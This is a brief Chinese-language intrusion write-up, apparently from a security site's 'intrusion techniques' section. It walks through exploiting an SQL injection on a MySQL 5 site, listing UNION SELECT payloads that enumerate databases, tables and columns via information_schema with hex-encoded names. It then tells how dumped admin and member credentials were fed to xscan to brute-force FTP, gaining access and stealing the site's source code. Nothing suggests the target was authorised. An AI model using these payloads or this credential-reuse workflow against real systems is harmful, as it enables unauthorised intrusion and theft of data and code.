找注射点,判断字段数就不提了。
判断下权限,非root连,没有load_file()的权限,不能select into outfile,幸好mysql版本是5.
获取库名
and 1=2 union select 1,2,3,database(),5....,87/*
或者
and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1/*
and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 1,1/*
----------------------------------------------------------------------------------------------
获取表名:
数据库名转换成hex:admin=0x61646D696E
and 1=2 select TABLE_NAME from information_schema.TABLES%20where%20TABLE_SCHEMA=0x61646D696E%20limit 0,1/*
。。。依次往下爆
------------------------------------------------------------------------------------------------
获取字段值:
表 admin=0x61646D696E
and 1=2 select COLUMN_NAME from information_schema.COLUMNS%20where%20TABLE_NAME=0x61646D696E%20limit 0,1/*
---------------------------------------------------------------------------------------------------
爆出管理员帐号后,发现登录不了后台。于是又爆了10套member帐号。整理了下帐号和口令,扔xscan跑ftp口令,2分钟后拿到ftp权限。只是要源代码,到此收工。没技术含量!
|
安全中国首页 > 文章中心 > 入侵技术